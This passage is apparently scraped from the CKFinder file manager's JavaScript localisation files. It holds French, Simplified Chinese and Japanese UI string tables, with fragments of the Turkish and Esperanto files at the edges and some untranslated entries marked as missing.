kaydedildi.', contextMenuName : 'Düzenle', loadingFile : 'Dosya yükleniyor, lütfen bekleyin...' }, Maximize : { maximize : 'Büyült', minimize : 'Küçült' }, Gallery : { current : '{current} / {total} resim' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the French * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['fr'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, Inaccessible</span>', confirmCancel : 'Certaines options ont été modifiées. Êtes-vous sûr de vouloir fermer cette fenêtre ?', ok : 'OK', cancel : 'Annuler', confirmationTitle : 'Confirmation', messageTitle : 'Information', inputTitle : 'Question', undo : 'Annuler', redo : 'Rétablir', skip : 'Passer', skipAll : 'Passer tout', makeDecision : 'Quelle action choisir ?', rememberDecision: 'Se rappeler de la décision' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'fr', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Dossiers', FolderLoading : 'Chargement...', FolderNew : 'Entrez le nouveau nom du dossier: ', FolderRename : 'Entrez le nouveau nom du dossier: ', FolderDelete : 'Êtes-vous sûr de vouloir effacer le dossier "%1"?', FolderRenaming : ' (Renommage en cours...)', FolderDeleting : ' (Suppression en cours...)', DestinationFolder : 'Dossier de destination', // Files FileRename : 'Entrez le nouveau nom du fichier: ', FileRenameExt : 'Êtes-vous sûr de vouloir changer l\'extension de ce fichier? Le fichier pourrait devenir inutilisable.', FileRenaming : 'Renommage en cours...', FileDelete : 'Êtes-vous sûr de vouloir effacer le fichier "%1"?', FilesDelete : 'Êtes-vous sûr de vouloir supprimer %1 fichiers ?', FilesLoading : 'Chargement...', FilesEmpty : 'Répertoire vide', DestinationFile : 'Fichier de destination', SkippedFiles : 'Liste des fichiers ignorés : ', // Basket BasketFolder : 'Corbeille', BasketClear : 'Vider la corbeille', BasketRemove : 'Retirer de la corbeille', BasketOpenFolder : 'Ouvrir le répertiore parent', BasketTruncateConfirm : 'Êtes-vous sûr de vouloir supprimer tous les fichiers de la corbeille ?', BasketRemoveConfirm : 'Êtes-vous sûr de vouloir supprimer le fichier "%1" de la corbeille ?', BasketRemoveConfirmMultiple : 'Êtes-vous sûr de vouloir supprimer %1 fichiers de la corbeille ?', BasketEmpty : 'Aucun fichier dans la corbeille, déposez en queques uns.', BasketCopyFilesHere : 'Copier des fichiers depuis la corbeille', BasketMoveFilesHere : 'Déplacer des fichiers depuis la corbeille', // Global messages OperationCompletedSuccess : 'Operation terminée avec succès.', OperationCompletedErrors : 'Operation terminée avec des erreurs.', FileError : '%s: %e', // Move and Copy files MovedFilesNumber : 'Nombre de fichiers déplacés : %s.', CopiedFilesNumber : 'Nombre de fichiers copiés : %s.', MoveFailedList : 'Les fichiers suivants ne peuvent être déplacés :<br />%s', CopyFailedList : 'Les fichiers suivants ne peuvent être copiés :<br />%s', // Toolbar Buttons (some used elsewhere) Upload : 'Envoyer', UploadTip : 'Envoyer un nouveau fichier', Refresh : 'Rafraîchir', Settings : 'Configuration', Help : 'Aide', HelpTip : 'Aide', // Context Menus Select : 'Choisir', SelectThumbnail : 'Choisir une miniature', View : 'Voir', Download : 'Télécharger', NewSubFolder : 'Nouveau sous-dossier', Rename : 'Renommer', Delete : 'Effacer', DeleteFiles : 'Supprimer les fichiers', CopyDragDrop : 'Copier ici', MoveDragDrop : 'Déplacer ici', // Dialogs RenameDlgTitle : 'Renommer', NewNameDlgTitle : 'Nouveau fichier', FileExistsDlgTitle : 'Fichier déjà existant', SysErrorDlgTitle : 'Erreur système', FileOverwrite : 'Ré-écrire', FileAutorename : 'Re-nommage automatique', ManuallyRename : 'Renommage manuel', // Generic OkBtn : 'OK', CancelBtn : 'Annuler', CloseBtn : 'Fermer', // Upload Panel UploadTitle : 'Envoyer un nouveau fichier', UploadSelectLbl : 'Sélectionner le fichier à télécharger', UploadProgressLbl : '(Envoi en cours, veuillez patienter...)', UploadBtn : 'Envoyer le fichier sélectionné', UploadBtnCancel : 'Annuler', UploadNoFileMsg : 'Sélectionner un fichier sur votre ordinateur.', UploadNoFolder : 'Merci de sélectionner un répertoire avant l\'envoi.', UploadNoPerms : 'L\'envoi de fichier n\'est pas autorisé.', UploadUnknError : 'Erreur pendant l\'envoi du fichier.', UploadExtIncorrect : 'L\'extension du fichier n\'est pas autorisée dans ce dossier.', // Flash Uploads UploadLabel : 'Fichier à envoyer', UploadTotalFiles : 'Nombre de fichiers :', UploadTotalSize : 'Poids total :', UploadSend : 'Envoyer', UploadAddFiles : 'Ajouter des fichiers', UploadClearFiles : 'Supprimer les fichiers', UploadCancel : 'Annuler l\'envoi', UploadRemove : 'Retirer', UploadRemoveTip : 'Retirer !f', UploadUploaded : 'Téléchargement !n%', UploadProcessing : 'Progression...', // Settings Panel SetTitle : 'Configuration', SetView : 'Voir :', SetViewThumb : 'Miniatures', SetViewList : 'Liste', SetDisplay : 'Affichage :', SetDisplayName : 'Nom du fichier', SetDisplayDate : 'Date', SetDisplaySize : 'Taille du fichier', SetSort : 'Classement :', SetSortName : 'par nom de fichier', SetSortDate : 'par date', SetSortSize : 'par taille', SetSortExtension : 'par extension de fichier', // Status Bar FilesCountEmpty : '<Dossier Vide>', FilesCountOne : '1 fichier', FilesCountMany : '%1 fichiers', // Size and Speed Kb : '%1 Ko', Mb : '%1 Mo', Gb : '%1 Go', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : 'La demande n\'a pas abouti. (Erreur %1)', Errors : { 10 : 'Commande invalide.', 11 : 'Le type de ressource n\'a pas été spécifié dans la commande.', 12 : 'Le type de ressource n\'est pas valide.', 102 : 'Nom de fichier ou de dossier invalide.', 103 : 'La demande n\'a pas abouti : problème d\'autorisations.', 104 : 'La demande n\'a pas abouti : problème de restrictions de permissions.', 105 : 'Extension de fichier invalide.', 109 : 'Demande invalide.', 110 : 'Erreur inconnue.', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : 'Un fichier ou un dossier avec ce nom existe déjà.', 116 : 'Ce dossier n\'existe pas. Veuillez rafraîchir la page et réessayer.', 117 : 'Ce fichier n\'existe pas. Veuillez rafraîchir la page et réessayer.', 118 : 'Les chemins vers la source et la cible sont les mêmes.', 201 : 'Un fichier avec ce nom existe déjà. Le fichier téléversé a été renommé en "%1".', 202 : 'Fichier invalide.', 203 : 'Fichier invalide. La taille est trop grande.', 204 : 'Le fichier téléversé est corrompu.', 205 : 'Aucun dossier temporaire n\'est disponible sur le serveur.', 206 : 'Envoi interrompu pour raisons de sécurité. Le fichier contient des données de type HTML.', 207 : 'Le fichier téléchargé a été renommé "%1".', 300 : 'Le déplacement des fichiers a échoué.', 301 : 'La copie des fichiers a échoué.', 500 : 'L\'interface de gestion des fichiers est désactivé. Contactez votre administrateur et vérifier le fichier de configuration de CKFinder.', 501 : 'La fonction "miniatures" est désactivée.' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'Le nom du fichier ne peut être vide.', FileExists : 'Le fichier %s existes déjà.', FolderEmpty : 'Le nom du dossier ne peut être vide.', FolderExists : 'Le dossier %s existe déjà.', FolderNameExists : 'Le dossier existe déjà.', FileInvChar : 'Le nom du fichier ne peut pas contenir les charactères suivants : \n\\ / : * ? " < > |', FolderInvChar : 'Le nom du dossier ne peut pas contenir les charactères suivants : \n\\ / : * ? " < > |', PopupBlockView : 'Il n\'a pas été possible d\'ouvrir la nouvelle fenêtre. Désactiver votre bloqueur de fenêtres pour ce site.', XmlError : 'Impossible de charger correctement la réponse XML du serveur web.', XmlEmpty : 'Impossible de charger la réponse XML du serveur web. Le serveur a renvoyé une réponse vide.', XmlRawResponse : 'Réponse du serveur : %s' }, // Imageresize plugin Imageresize : { dialogTitle : 'Redimensionner %s', sizeTooBig : 'Impossible de modifier la hauteur ou la largeur de cette image pour une valeur plus grande que l\'original (%size).', resizeSuccess : 'L\'image a été redimensionnée avec succès.', thumbnailNew : 'Créer une nouvelle vignette', thumbnailSmall : 'Petit (%s)', thumbnailMedium : 'Moyen (%s)', thumbnailLarge : 'Gros (%s)', newSize : 'Déterminer les nouvelles dimensions', width : 'Largeur', height : 'Hauteur', invalidHeight : 'Hauteur invalide.', invalidWidth : 'Largeur invalide.', invalidName : 'Nom de fichier incorrect.', newImage : 'Créer une nouvelle image', noExtensionChange : 'L\'extension du fichier ne peut pas être changé.', imageSmall : 'L\'image est trop petit', contextMenuName : 'Redimensionner', lockRatio : 'Conserver les proportions', resetSize : 'Taille d\'origine' }, // Fileeditor plugin Fileeditor : { save : 'Sauvegarder', fileOpenError : 'Impossible d\'ouvrir le fichier', fileSaveSuccess : 'Fichier sauvegardé avec succès.', contextMenuName : 'Edition', loadingFile : 'Chargement du fichier, veuillez patientez...' }, Maximize : { maximize : 'Agrandir', minimize : 'Minimiser' }, Gallery : { current : 'Image {current} sur {total}' }, Zip : { extractHereLabel : 'Décompresser ici', extractToLabel : 'Décompresser vers...', downloadZipLabel : 'Zipper et télécharger', compressZipLabel : 'Zipper', removeAndExtract : 'Supprimer les fichiers existants et décompresser', extractAndOverwrite : 'Décompresser et remplacer les fichier existants', extractSuccess : 'Les fichiers ont été décompressés avec succès.' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Chinese-Simplified * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['zh-cn'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, 不可用</span>', confirmCancel : '部分内容尚未保存,确定关闭对话框么?', ok : '确定', cancel : '取消', confirmationTitle : '确认', messageTitle : '提示', inputTitle : '询问', undo : '撤销', redo : '重做', skip : '跳过', skipAll : '全部跳过', makeDecision : '应采取何样措施?', rememberDecision: '下次不再询问' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'zh-cn', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'yyyy年m月d日 h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : '文件夹', FolderLoading : '正在加载文件夹...', FolderNew : '请输入新文件夹名称: ', FolderRename : '请输入新文件夹名称: ', FolderDelete : '您确定要删除文件夹 "%1" 吗?', FolderRenaming : ' (正在重命名...)', FolderDeleting : ' (正在删除...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : '请输入新文件名: ', FileRenameExt : '如果改变文件扩展名,可能会导致文件不可用。\r\n确定要更改吗?', FileRenaming : '正在重命名...', FileDelete : '您确定要删除文件 "%1" 吗?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : '加载中...', FilesEmpty : '空文件夹', DestinationFile : 'Destination File', // MISSING SkippedFiles : 'List of skipped files:', // MISSING // Basket BasketFolder : '临时文件夹', BasketClear : '清空临时文件夹', BasketRemove : '从临时文件夹移除', BasketOpenFolder : '打开临时文件夹', BasketTruncateConfirm : '确认清空临时文件夹?', BasketRemoveConfirm : '确认从临时文件夹中移除文件 "%1"?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : '临时文件夹为空, 可拖放文件至其中。', BasketCopyFilesHere : '从临时文件夹复制至此', BasketMoveFilesHere : '从临时文件夹移动至此', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : '上传', UploadTip : '上传文件', Refresh : '刷新', Settings : '设置', Help : '帮助', HelpTip : '查看在线帮助', // Context Menus Select : '选择', SelectThumbnail : '选中缩略图', View : '查看', Download : '下载', NewSubFolder : '创建子文件夹', Rename : '重命名', Delete : '删除', DeleteFiles : 'Delete Files', // MISSING CopyDragDrop : '将文件复制至此', MoveDragDrop : '将文件移动至此', // Dialogs RenameDlgTitle : '重命名', NewNameDlgTitle : '文件名', FileExistsDlgTitle : '文件已存在', SysErrorDlgTitle : '系统错误', FileOverwrite : '自动覆盖重名文件', FileAutorename : '给重名文件自动命名', ManuallyRename : 'Manually rename', // MISSING // Generic OkBtn : '确定', CancelBtn : '取消', CloseBtn : '关闭', // Upload Panel UploadTitle : '上传文件', UploadSelectLbl : '选定要上传的文件', UploadProgressLbl : '(正在上传文件,请稍候...)', UploadBtn : '上传选定的文件', UploadBtnCancel : '取消', UploadNoFileMsg : '请选择一个要上传的文件', UploadNoFolder : '需先选择一个文件。', UploadNoPerms : '无文件上传权限。', UploadUnknError : '上传文件出错。', UploadExtIncorrect : '此文件后缀在当前文件夹中不可用。', // Flash Uploads UploadLabel : '上传文件', UploadTotalFiles : '上传总计:', UploadTotalSize : '上传总大小:', UploadSend : '上传', UploadAddFiles : '添加文件', UploadClearFiles : '清空文件', UploadCancel : '取消上传', UploadRemove : '删除', UploadRemoveTip : '已删除!f', UploadUploaded : '已上传!n%', UploadProcessing : '上传中...', // Settings Panel SetTitle : '设置', SetView : '查看:', SetViewThumb : '缩略图', SetViewList : '列表', SetDisplay : '显示:', SetDisplayName : '文件名', SetDisplayDate : '日期', SetDisplaySize : '大小', SetSort : '排列顺序:', SetSortName : '按文件名', SetSortDate : '按日期', SetSortSize : '按大小', SetSortExtension : '按扩展名', // Status Bar FilesCountEmpty : '<空文件夹>', FilesCountOne : '1 个文件', FilesCountMany : '%1 个文件', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', Gb : '%1 GB', SizePerSecond : '%1/s', // Connector Error Messages. ErrorUnknown : '请求的操作未能完成. (错误 %1)', Errors : { 10 : '无效的指令。', 11 : '文件类型不在许可范围之内。', 12 : '文件类型无效。', 102 : '无效的文件名或文件夹名称。', 103 : '由于作者限制,该请求不能完成。', 104 : '由于文件系统的限制,该请求不能完成。', 105 : '无效的扩展名。', 109 : '无效请求。', 110 : '未知错误。', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : '存在重名的文件或文件夹。', 116 : '文件夹不存在. 请刷新后再试。', 117 : '文件不存在. 请刷新列表后再试。', 118 : '目标位置与当前位置相同。', 201 : '文件与现有的重名. 新上传的文件改名为 "%1"。', 202 : '无效的文件。', 203 : '无效的文件. 文件尺寸太大。', 204 : '上传文件已损失。', 205 : '服务器中的上传临时文件夹无效。', 206 : '因为安全原因,上传中断. 上传文件包含不能 HTML 类型数据。', 207 : '新上传的文件改名为 "%1"。', 300 : '移动文件失败。', 301 : '复制文件失败。', 500 : '因为安全原因,文件不可浏览. 请联系系统管理员并检查CKFinder配置文件。', 501 : '不支持缩略图方式。' }, // Other Error Messages. ErrorMsg : { FileEmpty : '文件名不能为空。', FileExists : '文件 %s 已存在。', FolderEmpty : '文件夹名称不能为空。', FolderExists : 'Folder %s already exists.', // MISSING FolderNameExists : 'Folder already exists.', // MISSING FileInvChar : '文件名不能包含以下字符: \n\\ / : * ? " < > |', FolderInvChar : '文件夹名称不能包含以下字符: \n\\ / : * ? " < > |', PopupBlockView : '未能在新窗口中打开文件. 请修改浏览器配置解除对本站点的锁定。', XmlError : '从服务器读取XML数据出错', XmlEmpty : '无法从服务器读取数据,因XML响应返回结果为空', XmlRawResponse : '服务器返回原始结果: %s' }, // Imageresize plugin Imageresize : { dialogTitle : '改变尺寸 %s', sizeTooBig : '无法大于原图尺寸 (%size)。', resizeSuccess : '图像尺寸已修改。', thumbnailNew : '创建缩略图', thumbnailSmall : '小 (%s)', thumbnailMedium : '中 (%s)', thumbnailLarge : '大 (%s)', newSize : '设置新尺寸', width : '宽度', height : '高度', invalidHeight : '无效高度。', invalidWidth : '无效宽度。', invalidName : '文件名无效。', newImage : '创建图像', noExtensionChange : '无法改变文件后缀。', imageSmall : '原文件尺寸过小', contextMenuName : '改变尺寸', lockRatio : '锁定比例', resetSize : '原始尺寸' }, // Fileeditor plugin Fileeditor : { save : '保存', fileOpenError : '无法打开文件。', fileSaveSuccess : '成功保存文件。', contextMenuName : '编辑', loadingFile : '加载文件中...' }, Maximize : { maximize : '全屏', minimize : '最小化' }, Gallery : { current : '第 {current} 个图像,共 {total} 个' }, Zip : { extractHereLabel : 'Extract here', // MISSING extractToLabel : 'Extract to...', // MISSING downloadZipLabel : 'Download as zip', // MISSING compressZipLabel : 'Compress to zip', // MISSING removeAndExtract : 'Remove existing and extract', // MISSING extractAndOverwrite : 'Extract overwriting existing files', // MISSING extractSuccess : 'File extracted successfully.' // MISSING } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Japanese * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['ja'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, は利用できません。</span>', confirmCancel : '変更された項目があります。ウィンドウを閉じてもいいですか?', ok : 'OK', cancel : 'キャンセル', confirmationTitle : '確認', messageTitle : 'インフォメーション', inputTitle : '質問', undo : '元に戻す', redo : 'やり直す', skip : 'スキップ', skipAll : 'すべてスキップ', makeDecision : 'どうしますか?', rememberDecision: '全てに適用する' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'ja', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'm/d/yyyy h:MM aa', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'フォルダ', FolderLoading : '読み込み中...', FolderNew : '新しいフォルダ名を入力してください: ', FolderRename : '新しいフォルダ名を入力してください: ', FolderDelete : '本当にフォルダ「"%1"」を削除してもよろしいですか?', FolderRenaming : ' (リネーム中...)', FolderDeleting : ' (削除中...)', DestinationFolder : '適用するフォルダ', // Files FileRename : '新しいファイル名を入力してください: ', FileRenameExt : 'ファイルが使えなくなる可能性がありますが、本当に拡張子を変更してもよろしいですか?', FileRenaming : 'リネーム中...', FileDelete : '本当に「"%1"」を削除してもよろしいですか?', FilesDelete : 'これらの %1 つのファイルを削除してもよろしいですか? ', FilesLoading : '読み込み中...', FilesEmpty : 'ファイルがありません', DestinationFile : '適用するファイル', SkippedFiles : 'スキップしたファイルのリスト:', // Basket BasketFolder : 'Basket', BasketClear : 'バスケットを空にする', BasketRemove : 'バスケットから削除', BasketOpenFolder : '親フォルダを開く', BasketTruncateConfirm : '本当にバスケットの中身を空にしますか?', BasketRemoveConfirm : '本当に「"%1"」をバスケットから削除しますか?', BasketRemoveConfirmMultiple : 'Do you really want to remove %1 files from the basket?', // MISSING BasketEmpty : 'バスケットの中にファイルがありません。このエリアにドラッグ&ドロップして追加することができます。', BasketCopyFilesHere : 'バスケットからファイルをコピー', BasketMoveFilesHere : 'バスケットからファイルを移動', // Global messages OperationCompletedSuccess : 'Operation completed successfully.', // MISSING OperationCompletedErrors : 'Operation completed with errors.', // MISSING FileError : '%s: %e', // MISSING // Move and Copy files MovedFilesNumber : 'Number of files moved: %s.', // MISSING CopiedFilesNumber : 'Number of files copied: %s.', // MISSING MoveFailedList : 'The following files could not be moved:<br />%s', // MISSING CopyFailedList : 'The following files could not be copied:<br />%s', // MISSING // Toolbar Buttons (some used elsewhere) Upload : 'アップロード', UploadTip : '新しいファイルのアップロード', Refresh : '表示の更新', Settings : 'カスタマイズ', Help : 'ヘルプ', HelpTip : 'ヘルプ', // Context Menus Select : 'この画像を選択', SelectThumbnail : 'この画像のサムネイルを選択', View : '画像だけを表示', Download : 'ダウンロード', NewSubFolder : '新しいフォルダに入れる', Rename : 'ファイル名の変更', Delete : '削除', DeleteFiles : 'ファイルを削除する', CopyDragDrop : 'コピーするファイルをここにドロップしてください', MoveDragDrop : '移動するファイルをここにドロップしてください', // Dialogs RenameDlgTitle : 'リネーム', NewNameDlgTitle : '新しい名前', FileExistsDlgTitle : 'ファイルはすでに存在します。', SysErrorDlgTitle : 'システムエラー', FileOverwrite : '上書き', FileAutorename : '自動でリネーム', ManuallyRename : '手動でリネーム', // Generic OkBtn : 'OK', CancelBtn : 'キャンセル', CloseBtn : '閉じる', // Upload Panel UploadTitle : 'ファイルのアップロード', UploadSelectLbl : 'アップロードするファイルを選択してください', UploadProgressLbl : '(ファイルのアップロード中...)', UploadBtn : 'アップロード', UploadBtnCancel : 'キャンセル', UploadNoFileMsg : 'ファイルを選んでください。', UploadNoFolder : 'アップロードの前にフォルダを選択してください。', UploadNoPerms : 'ファイルのアップロード権限がありません。', UploadUnknError : 'ファイルの送信に失敗しました。', UploadExtIncorrect : '選択されたファイルの拡張子は許可されていません。', // Flash Uploads UploadLabel : 'アップロード', UploadTotalFiles : 'アップロードしたファイル数:', UploadTotalSize : 'ファイルサイズ:', UploadSend : 'アップロード', UploadAddFiles : 'ファイルを追加', UploadClearFiles : 'クリア', UploadCancel : 'キャンセル', UploadRemove : '削除', UploadRemoveTip : '!fを削除しました', UploadUploaded : '!n%をアップロードしました', UploadProcessing : 'アップロード中...', // Settings Panel SetTitle : '表示のカスタマイズ', SetView : '表示方法:', SetViewThumb : 'サムネイル', SetViewList : '表示形式', SetDisplay : '表示する項目:', SetDisplayName : 'ファイル名', SetDisplayDate : '日時', SetDisplaySize : 'ファイルサイズ', SetSort : '表示の順番:', SetSortName : 'ファイル名', SetSortDate : '日付', SetSortSize : 'サイズ', SetSortExtension : '拡張子', // Status Bar FilesCountEmpty : '<フォルダ内にファイルがありません>', FilesCountOne : '1つのファイル', FilesCountMany : '%1個のファイル', // Size and Speed Kb : '%1 KB', Mb : '%1 MB', // MISSING Gb : '%1 GB', // MISSING SizePerSecond : '%1/s', // MISSING // Connector Error Messages. ErrorUnknown : 'リクエストの処理に失敗しました。 (Error %1)', Errors : { 10 : '不正なコマンドです。', 11 : 'リソースタイプが特定できませんでした。', 12 : '要求されたリソースのタイプが正しくありません。', 102 : 'ファイル名/フォルダ名が正しくありません。', 103 : 'リクエストを完了できませんでした。認証エラーです。', 104 : 'リクエストを完了できませんでした。ファイルのパーミッションが許可されていません。', 105 : '拡張子が正しくありません。', 109 : '不正なリクエストです。', 110 : '不明なエラーが発生しました。', 111 : 'It was not possible to complete the request due to resulting file size.', // MISSING 115 : '同じ名前のファイル/フォルダがすでに存在しています。', 116 : 'フォルダが見つかりませんでした。ページを更新して再度お試し下さい。', 117 : 'ファイルが見つかりませんでした。ページを更新して再度お試し下さい。', 118 : '対象が移動元と同じ場所を指定されています。', 201 : '同じ名前のファイルがすでに存在しています。"%1" にリネームして保存されました。', 202 : '不正なファイルです。', 203 : 'ファイルのサイズが大きすぎます。', 204 : 'アップロードされたファイルは壊れています。', 205 : 'サーバ内の一時作業フォルダが利用できません。', 206 : 'セキュリティ上の理由からアップロードが取り消されました。このファイルにはHTMLに似たデータが含まれています。', 207 : 'ファイルは "%1" にリネームして保存されました。', 300 : 'ファイルの移動に失敗しました。', 301 : 'ファイルのコピーに失敗しました。', 500 : 'ファイルブラウザはセキュリティ上の制限から無効になっています。システム担当者に連絡をして、CKFinderの設定をご確認下さい。', 501 : 'サムネイル機能は無効になっています。' }, // Other Error Messages. ErrorMsg : { FileEmpty : 'ファイル名を入力してください', FileExists : ' %s はすでに存在しています。別の名前を入力してください。', FolderEmpty : 'フォルダ名を入力してください。', FolderExists : 'フォルダ %s は既に存在しています。', FolderNameExists : 'フォルダは既に存在しています。', FileInvChar : 'ファイルに以下の文字は使えません: \n\\ / : * ? " < > |', FolderInvChar : 'フォルダに以下の文字は使えません: \n\\ / : * ? " < > |', PopupBlockView : 'ファイルを新しいウィンドウで開くことに失敗しました。 お使いのブラウザの設定でポップアップをブロックする設定を解除してください。', XmlError : 'It was not possible to properly load the XML response from the web server.', // MISSING XmlEmpty : 'It was not possible to load the XML response from the web server. The server returned an empty response.', // MISSING XmlRawResponse : 'Raw response from the server: %s' // MISSING }, // Imageresize plugin Imageresize : { dialogTitle : 'リサイズ: %s', sizeTooBig : 'オリジナルの画像よりも大きいサイズは指定できません。 (%size).', resizeSuccess : '画像のリサイズに成功しました', thumbnailNew : 'サムネイルをつくる', thumbnailSmall : '小 (%s)', thumbnailMedium : '中 (%s)', thumbnailLarge : '大 (%s)', newSize : 'Set new size', width : '幅', height : '高さ', invalidHeight : '高さの値が不正です。', invalidWidth : '幅の値が不正です。', invalidName : 'ファイル名が不正です。', newImage : '新しい画像を作成', noExtensionChange : '拡張子は変更できません。', imageSmall : '元画像が小さすぎます。', contextMenuName : 'リサイズ', lockRatio : 'ロック比率', resetSize : 'サイズリセット' }, // Fileeditor plugin Fileeditor : { save : '保存', fileOpenError : 'ファイルを開けませんでした。', fileSaveSuccess : 'ファイルの保存が完了しました。', contextMenuName : '編集', loadingFile : 'ファイルの読み込み中...' }, Maximize : { maximize : '最大化', minimize : '最小化' }, Gallery : { current : 'Image {current} of {total}' // MISSING }, Zip : { extractHereLabel : 'ここに解凍する', extractToLabel : 'フォルダを指定して解凍する', downloadZipLabel : 'zipファイルでダウンロード', compressZipLabel : 'zipファイルにする', removeAndExtract : '既存のファイルを削除して解凍しました。', extractAndOverwrite : '解凍して既存のファイルに上書きしました。', extractSuccess : '解凍が完了しました。' } };
JavaScript
/* * CKFinder * ======== * http://cksource.com/ckfinder * Copyright (C) 2007-2013, CKSource - Frederico Knabben. All rights reserved. * * The software, this file, and its contents are subject to the CKFinder * License. Please read the license.txt file before using, installing, copying, * modifying, or distributing this file or part of its contents. The contents of * this file is part of the Source Code of CKFinder. * */ /** * @fileOverview Defines the {@link CKFinder.lang} object for the Esperanto * language. */ /** * Contains the dictionary of language entries. * @namespace */ CKFinder.lang['eo'] = { appTitle : 'CKFinder', // Common messages and labels. common : { // Put the voice-only part of the label in the span. unavailable : '%1<span class="cke_accessibility">, nedisponebla</span>', confirmCancel : 'Iuj opcioj estas modifitaj. Ĉu vi certas, ke vi volas fermi tiun fenestron?', ok : 'Bone', cancel : 'Rezigni', confirmationTitle : 'Konfirmo', messageTitle : 'Informo', inputTitle : 'Demando', undo : 'Malfari', redo : 'Refari', skip : 'Transsalti', skipAll : 'Transsalti ĉion', makeDecision : 'Kiun agon elekti?', rememberDecision: 'Memori la decidon' }, // Language direction, 'ltr' or 'rtl'. dir : 'ltr', HelpLang : 'en', LangCode : 'eo', // Date Format // d : Day // dd : Day (padding zero) // m : Month // mm : Month (padding zero) // yy : Year (two digits) // yyyy : Year (four digits) // h : Hour (12 hour clock) // hh : Hour (12 hour clock, padding zero) // H : Hour (24 hour clock) // HH : Hour (24 hour clock, padding zero) // M : Minute // MM : Minute (padding zero) // a : Firt char of AM/PM // aa : AM/PM DateTime : 'dd/mm/yyyy H:MM', DateAmPm : ['AM', 'PM'], // Folders FoldersTitle : 'Dosierujoj', FolderLoading : 'Estas ŝargata...', FolderNew : 'Bonvolu entajpi la nomon de la nova dosierujo: ', FolderRename : 'Bonvolu entajpi la novan nomon de la dosierujo: ', FolderDelete : 'Ĉu vi certas, ke vi volas forigi la "%1"dosierujon?', FolderRenaming : ' (Estas renomata...)', FolderDeleting : ' (Estas forigata...)', DestinationFolder : 'Destination Folder', // MISSING // Files FileRename : 'Entajpu la novan nomon de la dosiero: ', FileRenameExt : 'Ĉu vi certas, ke vi volas ŝanĝi la dosiernoman finaĵon? La dosiero povus fariĝi neuzebla.', FileRenaming : 'Estas renomata...', FileDelete : 'Ĉu vi certas, ke vi volas forigi la dosieron "%1"?', FilesDelete : 'Are you sure you want to delete %1 files?', // MISSING FilesLoading : 